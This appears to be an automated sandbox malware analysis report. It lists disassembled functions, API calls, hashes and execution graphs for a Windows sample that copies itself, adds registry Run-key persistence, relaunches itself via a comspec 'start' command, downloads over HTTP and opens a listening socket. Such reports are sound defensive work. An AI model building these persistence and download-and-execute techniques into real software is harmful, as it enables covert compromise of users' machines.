                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CreateInitializeInstancewsprintf
                                                                    • String ID: %comspec%$/c start %s & start %s\DriveSecManager.exe
                                                                    • API String ID: 2038452267-3640840557
                                                                    • Opcode ID: 4992a1b2003cae7c91a3a7b86177e2a1dc405837f2ddce0001cb864d4f031ccd
                                                                    • Instruction ID: 827debbb99fb5d40cfb779b5d8ae5ab415415813199b490bc36420c15ce2df05
                                                                    • Opcode Fuzzy Hash: 4992a1b2003cae7c91a3a7b86177e2a1dc405837f2ddce0001cb864d4f031ccd
                                                                    • Instruction Fuzzy Hash: 0C31D875A40208BFDB04DF98D884FDEB7B5EF88704F208199F619A73A4C674AE81CB54
                                                                    Function 0040D410 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(020D0634), ref: 0040D429
                                                                    • CloseHandle.KERNEL32(020D0638), ref: 0040D458
                                                                    • LeaveCriticalSection.KERNEL32(020D0634), ref: 0040D467
                                                                    • DeleteCriticalSection.KERNEL32(020D0634), ref: 0040D474
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$CloseDeleteEnterHandleLeave
                                                                    • String ID: .Mw
                                                                    • API String ID: 3102160386-2453323595
                                                                    • Opcode ID: 07dc70c68ac7b0d2cc494817546f3db23909211f8ba204667fa5a7f367d8b6f4
                                                                    • Instruction ID: 6cfc4b79706d1bba1c4fbc1f32f5c608acb329628ab24e105d00911b1e03cc11
                                                                    • Opcode Fuzzy Hash: 07dc70c68ac7b0d2cc494817546f3db23909211f8ba204667fa5a7f367d8b6f4
                                                                    • Instruction Fuzzy Hash: AC112D74D00208EFDB08DF94D984A9EBB75FF48309F2081A9E806AB341D734EE95DB95
                                                                    Function 00401330 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42synchronizationCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401346
                                                                    • WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401352
                                                                    • CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 0040135C
                                                                      • Part of subcall function 0040A1B0: RtlFreeHeap.NTDLL(020D0000,00000000,00402612,?,00402612,?), ref: 0040A20B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CloseEventFreeHandleHeapObjectSingleWait
                                                                    • String ID: pdu$.Mw
                                                                    • API String ID: 309973729-3908477397
                                                                    • Opcode ID: 2fa896684b321fe836e516ce056a9b06d37fd724aa26af72c169520ae3e67de3
                                                                    • Instruction ID: 8798272c393d99dde58c69795aa0ec1d050c8eff8ee51a61ed5db2294712bea8
                                                                    • Opcode Fuzzy Hash: 2fa896684b321fe836e516ce056a9b06d37fd724aa26af72c169520ae3e67de3
                                                                    • Instruction Fuzzy Hash: 400186765003109BCB21AF55ECC4E9B7779AF48311B044679FD056B396C638E85487A5
                                                                    Function 00401820 Relevance: 7.6, APIs: 5, Instructions: 116COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401846
                                                                    • InterlockedDecrement.KERNEL32(?), ref: 004018B1
                                                                      • Part of subcall function 004017A0: EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                      • Part of subcall function 004017A0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                      • Part of subcall function 004017A0: LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Interlocked$CriticalExchangeSection$DecrementEnterLeave
                                                                    • String ID:
                                                                    • API String ID: 3966618661-0
                                                                    • Opcode ID: 8ff310e7853ca029222ff4769d80b5f1c3030ef883704326f7d9456a7b5fb0ab
                                                                    • Instruction ID: 5b2b6301c056c53cf24b756eb28b55477e9028745ee4fe4862f5ad68d4db2f6a
                                                                    • Opcode Fuzzy Hash: 8ff310e7853ca029222ff4769d80b5f1c3030ef883704326f7d9456a7b5fb0ab
                                                                    • Instruction Fuzzy Hash: 1841B371604A02AFC714EB39D848797F7A4BF88310F14827EE82D933D1E735A855CB99
                                                                    Function 00408A90 Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: _allshl
                                                                    • String ID:
                                                                    • API String ID: 435966717-0
                                                                    • Opcode ID: 6ce938123fd61f227b6de6a29a17a105f2c46d2c2b520e971cfa59f1b0e97cc1
                                                                    • Instruction ID: 2f682f979519ea9f46037cdaf014f1fa89077d02b7b0d9f1a8f9fce332e03f2e
                                                                    • Opcode Fuzzy Hash: 6ce938123fd61f227b6de6a29a17a105f2c46d2c2b520e971cfa59f1b0e97cc1
                                                                    • Instruction Fuzzy Hash: 62F03672A11419D79720EFFFD4424CAF7E59F88354B118676F818E3270E5709D1146F5
                                                                    Function 00401F50 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401F83
                                                                    • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00401FAF
                                                                    • WSAGetLastError.WS2_32 ref: 00401FB9
                                                                    • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401FF9
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
                                                                    • String ID:
                                                                    • API String ID: 2074799992-0
                                                                    • Opcode ID: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
                                                                    • Instruction ID: 923efa3f85c100d8dcf87aa4bb405070ff806fabc372267044aefe38fa55a991
                                                                    • Opcode Fuzzy Hash: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
                                                                    • Instruction Fuzzy Hash: B72131715083119BC200DF55D844D6BB7E8BFCCB54F044A2DF598A3291D774EA49CBAA
                                                                    Function 00401C50 Relevance: 6.1, APIs: 4, Instructions: 59networksleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401C88
                                                                    • WSAGetLastError.WS2_32(?,?,?,00401FD3,00000000), ref: 00401C90
                                                                    • Sleep.KERNEL32(00000001,?,?,?,00401FD3,00000000), ref: 00401CA6
                                                                    • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401CCC
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Recv$ErrorLastSleep
                                                                    • String ID:
                                                                    • API String ID: 3668019968-0
                                                                    • Opcode ID: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
                                                                    • Instruction ID: 470b9b0004fc9485880b3b0232d8394a6163a25caab740c915041083b8486df8
                                                                    • Opcode Fuzzy Hash: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
                                                                    • Instruction Fuzzy Hash: 8811AD72148305AFD310CF65EC84AEBB7ECEB88710F40092EF945D2150E6B9E949A7B6
                                                                    Function 00401AE0 Relevance: 6.0, APIs: 4, Instructions: 49networksleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B0C
                                                                    • WSAGetLastError.WS2_32 ref: 00401B12
                                                                    • Sleep.KERNEL32(00000001), ref: 00401B28
                                                                    • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B4A
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Send$ErrorLastSleep
                                                                    • String ID:
                                                                    • API String ID: 2121970615-0
                                                                    • Opcode ID: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
                                                                    • Instruction ID: 56798eeddd779857b304cdb020dc52eae5646efd672cabe94dca1e5c1b4e91c2
                                                                    • Opcode Fuzzy Hash: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
                                                                    • Instruction Fuzzy Hash: 90014B712483046EE7209B96DC88F9B77A8EBC8711F408429F608DA2D0D7B5A9459B7A
                                                                    Function 004017A0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 00401808
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                    • String ID:
                                                                    • API String ID: 2223660684-0
                                                                    • Opcode ID: 37f68c2e8ae6063ea859c376eb200881b9ae20d6250016d66435a6145ab54c34
                                                                    • Instruction ID: 0184f799374b3cbd514a588550e5351e3808897b1395f0a2de410330185c2ead
                                                                    • Opcode Fuzzy Hash: 37f68c2e8ae6063ea859c376eb200881b9ae20d6250016d66435a6145ab54c34
                                                                    • Instruction Fuzzy Hash: DF01F7352423009FC3209F26EC44ADB77E8AF49711F04443EE80697650EB34E545DB28
                                                                    Function 0040D980 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040DBC0: memset.NTDLL ref: 0040DBE8
                                                                      • Part of subcall function 0040DBC0: InternetCrackUrlA.WININET(0040D699,00000000,10000000,0000003C), ref: 0040DC38
                                                                      • Part of subcall function 0040DBC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040DC48
                                                                      • Part of subcall function 0040DBC0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040DC81
                                                                      • Part of subcall function 0040DBC0: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040DCB7
                                                                      • Part of subcall function 0040DBC0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040DCDF
                                                                      • Part of subcall function 0040DBC0: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040DD28
                                                                      • Part of subcall function 0040DBC0: InternetCloseHandle.WININET(00000000), ref: 0040DDB7
                                                                      • Part of subcall function 0040DAB0: SysAllocString.OLEAUT32(00000000), ref: 0040DADE
                                                                      • Part of subcall function 0040DAB0: CoCreateInstance.OLE32(00412408,00000000,00004401,004123F8,00000000), ref: 0040DB06
                                                                      • Part of subcall function 0040DAB0: SysFreeString.OLEAUT32(00000000), ref: 0040DBA1
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040DA5B
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040DA65
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
                                                                    • String ID: %S%S
                                                                    • API String ID: 1017111014-3267608656
                                                                    • Opcode ID: 90752405ea59c0d94f47ff5784e28f2eddf96679eb43bf22d5b787ed4233eba5
                                                                    • Instruction ID: beec9ad9f3848cf7af9d47610756df11a49d132dd1bd9a4578eda8885410465d
                                                                    • Opcode Fuzzy Hash: 90752405ea59c0d94f47ff5784e28f2eddf96679eb43bf22d5b787ed4233eba5
                                                                    • Instruction Fuzzy Hash: 4941E6B5E002099FCB04DBE4C885AEFB7B9BF48304F148569E505B7391D738AA85CFA5
                                                                    Function 0040D250 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42synchronizationCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WaitForSingleObject.KERNEL32(?,00000000), ref: 0040D290
                                                                    • CloseHandle.KERNEL32(?), ref: 0040D2A9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandleObjectSingleWait
                                                                    • String ID: .Mw
                                                                    • API String ID: 528846559-2453323595
                                                                    • Opcode ID: e15632ae9c74927274e801b832af1c2d3c046c8cbd4ac2304eb1b22343a8a1a8
                                                                    • Instruction ID: d1fe1851c25795fdacbee2e877de448503af208f5fff4c31293181607202da8f
                                                                    • Opcode Fuzzy Hash: e15632ae9c74927274e801b832af1c2d3c046c8cbd4ac2304eb1b22343a8a1a8
                                                                    • Instruction Fuzzy Hash: 3B11C574A04208EFCB04CF84D580E69B7B6FB89354F2081AAEC05AB385C735EE52DB95

                                                                    Execution Graph

                                                                    Execution Coverage:22.5%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:13
                                                                    Total number of Limit Nodes:1

                                                                    Callgraph

                                                                    Executed Functions

                                                                    Function 00007FF7BFFE0685 Relevance: 1.6, APIs: 1, Instructions: 126nativeCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1644008324.00007FF7BFFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFFE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff7bffe0000_240016073.jbxd
                                                                    Similarity
                                                                    • API ID: InformationQuerySystem
                                                                    • String ID:
                                                                    • API String ID: 3562636166-0
                                                                    • Opcode ID: 08acd1e83d3bf0b71ee43c32630c4936db73b5807665742727b27dcd7e90fba9
                                                                    • Instruction ID: e31875e708f161b2194610f64b2e3e9236c41e1ea3b7b02b07eda57861b0e68b
                                                                    • Opcode Fuzzy Hash: 08acd1e83d3bf0b71ee43c32630c4936db73b5807665742727b27dcd7e90fba9
                                                                    • Instruction Fuzzy Hash: 8F31E571A0CA4C8FDB18DF9CE8456F9BBE1EBA5321F10423FD049D3651DB7068468B91
                                                                    Function 00007FF7BFFE0F11 Relevance: 1.6, APIs: 1, Instructions: 126nativeCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1644008324.00007FF7BFFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFFE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff7bffe0000_240016073.jbxd
                                                                    Similarity
                                                                    • API ID: InformationQuerySystem
                                                                    • String ID:
                                                                    • API String ID: 3562636166-0
                                                                    • Opcode ID: 893ceccecf04489e0994deebe1d34cde7f6d88148e52aaddece88e1072b36ae3
                                                                    • Instruction ID: a58f62a1a7436c04b9e9e0c2d4f4aa98c139b2d90b02b6414b3a0e1a22c6e78e
                                                                    • Opcode Fuzzy Hash: 893ceccecf04489e0994deebe1d34cde7f6d88148e52aaddece88e1072b36ae3
                                                                    • Instruction Fuzzy Hash: BA31047090CB889FDB18DB9CD8456F9BBE1EBA6321F00426FD049C3252CB606802CB81
                                                                    Function 00007FF7BFFE0690 Relevance: 1.6, APIs: 1, Instructions: 118nativeCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 14 7ff7bffe0690-7ff7bffe0fdf NtQuerySystemInformation 19 7ff7bffe0fe1 14->19 20 7ff7bffe0fe7-7ff7bffe1004 14->20 19->20
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1644008324.00007FF7BFFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFFE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff7bffe0000_240016073.jbxd
                                                                    Similarity
                                                                    • API ID: InformationQuerySystem
                                                                    • String ID:
                                                                    • API String ID: 3562636166-0
                                                                    • Opcode ID: 2e8da30ba0e61fb69efc55d4ccc8ca070d57be4352fbc521421ed13c035e4bab
                                                                    • Instruction ID: d77628adb49f9d95b9534f85ff1f26bb762f50e46eafd57a2f7a475392b7855c
                                                                    • Opcode Fuzzy Hash: 2e8da30ba0e61fb69efc55d4ccc8ca070d57be4352fbc521421ed13c035e4bab
                                                                    • Instruction Fuzzy Hash: 7B31C67191CA4C8FDB18EB9CA8456F9BBE1EB65321F10423FD049D3651DB7068528791

                                                                    Execution Graph

                                                                    Execution Coverage:0.1%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:1436
                                                                    Total number of Limit Nodes:1
                                                                    execution_graph 5816 40cf00 5822 4021b0 5816->5822 5819 40cf3f 5820 40cf25 WaitForSingleObject 5826 401600 5820->5826 5823 4021cf 5822->5823 5824 4021bb 5822->5824 5823->5819 5823->5820 5824->5823 5847 402020 5824->5847 5827 40160d 5826->5827 5846 401737 5826->5846 5828 401619 EnterCriticalSection 5827->5828 5827->5846 5829 4016b5 LeaveCriticalSection SetEvent 5828->5829 5832 401630 5828->5832 5830 4016d0 5829->5830 5831 4016e8 5829->5831 5833 4016d6 PostQueuedCompletionStatus 5830->5833 5834 40d2d0 11 API calls 5831->5834 5832->5829 5835 401641 InterlockedDecrement 5832->5835 5837 40165a InterlockedExchangeAdd 5832->5837 5843 4016a0 InterlockedDecrement 5832->5843 5833->5831 5833->5833 5836 4016f3 5834->5836 5835->5832 5838 40d410 6 API calls 5836->5838 5837->5832 5839 40166d InterlockedIncrement 5837->5839 5840 4016fc CloseHandle CloseHandle WSACloseEvent 5838->5840 5841 401c50 4 API calls 5839->5841 5868 40ab40 shutdown closesocket 5840->5868 5841->5832 5843->5832 5844 401724 DeleteCriticalSection 5845 40a1b0 _invalid_parameter 3 API calls 5844->5845 5845->5846 5846->5819 5848 409d90 7 API calls 5847->5848 5849 40202b 5848->5849 5850 402038 GetSystemInfo InitializeCriticalSection CreateEventA 5849->5850 5856 4021a5 5849->5856 5851 402076 CreateIoCompletionPort 5850->5851 5852 40219f 5850->5852 5851->5852 5853 40208f 5851->5853 5854 401600 35 API calls 5852->5854 5855 40d130 8 API calls 5853->5855 5854->5856 5857 402094 5855->5857 5856->5823 5857->5852 5858 40209f WSASocketA 5857->5858 5858->5852 5859 4020bd setsockopt htons bind 5858->5859 5859->5852 5860 402126 listen 5859->5860 5860->5852 5861 40213a WSACreateEvent 5860->5861 5861->5852 5862 402147 WSAEventSelect 5861->5862 5862->5852 5866 402159 5862->5866 5863 40217f 5865 40d160 16 API calls 5863->5865 5864 40d160 16 API calls 5864->5866 5867 402194 5865->5867 5866->5863 5866->5864 5867->5823 5868->5844 5343 406045 5345 405fbe 5343->5345 5344 40604a LeaveCriticalSection 5345->5344 5346 40a220 8 API calls 5345->5346 5347 40601c 5346->5347 5347->5344 5348 407b49 5349 407b52 5348->5349 5350 407b61 34 API calls 5349->5350 5351 408996 5349->5351 5881 40a28e 5882 40a1b0 _invalid_parameter 3 API calls 5881->5882 5885 40a24d 5882->5885 5883 40a262 5884 409fa0 __aligned_recalloc_base 7 API calls 5884->5885 5885->5883 5885->5884 5886 40a264 memcpy 5885->5886 5886->5885 4355 407590 Sleep CreateMutexA GetLastError 4356 4075c6 ExitProcess 4355->4356 4357 4075ce 6 API calls 4355->4357 4358 407673 4357->4358 4359 40795a Sleep 4357->4359 4411 40e730 GetLocaleInfoA strcmp 4358->4411 4418 40c7d0 4359->4418 4364 407ae1 4365 407975 9 API calls 4421 405bc0 InitializeCriticalSection CreateFileW 4365->4421 5236 407440 4365->5236 5243 405880 4365->5243 5252 406bc0 Sleep GetModuleFileNameW 4365->5252 4366 407680 ExitProcess 4367 407688 ExpandEnvironmentStringsW wsprintfW CopyFileW 4369 407779 Sleep wsprintfW CopyFileW 4367->4369 4370 4076dc SetFileAttributesW RegOpenKeyExW 4367->4370 4371 4077c1 SetFileAttributesW RegOpenKeyExW 4369->4371 4372 40785e Sleep ExpandEnvironmentStringsW wsprintfW CopyFileW 4369->4372 4370->4369 4374 407718 wcslen RegSetValueExW 4370->4374 4371->4372 4375 4077fd wcslen RegSetValueExW 4371->4375 4372->4359 4377 4078bd SetFileAttributesW RegOpenKeyExW 4372->4377 4374->4369 4378 40774d RegCloseKey 4374->4378 4375->4372 4379 407832 RegCloseKey 4375->4379 4377->4359 4381 4078f9 wcslen RegSetValueExW 4377->4381 4413 40e980 memset memset CreateProcessW 4378->4413 4383 40e980 6 API calls 4379->4383 4381->4359 4385 40792e RegCloseKey 4381->4385 4387 40784b 4383->4387 4389 40e980 6 API calls 4385->4389 4387->4372 4391 407856 ExitProcess 4387->4391 4388 407a2a CreateEventA 4451 40bf00 4388->4451 4393 407947 4389->4393 4390 407771 ExitProcess 4393->4359 4395 407952 ExitProcess 4393->4395 4402 40d160 16 API calls 4403 407a8a 4402->4403 4404 40d160 16 API calls 4403->4404 4405 407aa6 4404->4405 4406 40d160 16 API calls 4405->4406 4407 407ac2 4406->4407 4494 40d2d0 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 4407->4494 4409 407ad2 4503 40d410 4409->4503 4412 407678 4411->4412 4412->4366 4412->4367 4414 40e9f1 ShellExecuteW 4413->4414 4415 40e9e2 Sleep 4413->4415 4416 407766 4414->4416 4417 40ea17 Sleep 4414->4417 4415->4416 4416->4369 4416->4390 4417->4416 4511 40c7a0 4418->4511 4422 405cd1 4421->4422 4423 405bf8 CreateFileMappingW 4421->4423 4433 40d640 CoInitializeEx 4422->4433 4423->4422 4424 405c19 MapViewOfFile 4423->4424 4424->4422 4425 405c38 GetFileSize 4424->4425 4429 405c4d 4425->4429 4426 405cc7 UnmapViewOfFile 4426->4422 4427 405c5c 4427->4426 4429->4426 4429->4427 4430 405c8c 4429->4430 4640 40c820 4429->4640 4647 405cf0 4429->4647 4431 40a1b0 _invalid_parameter 3 API calls 4430->4431 4431->4427 4951 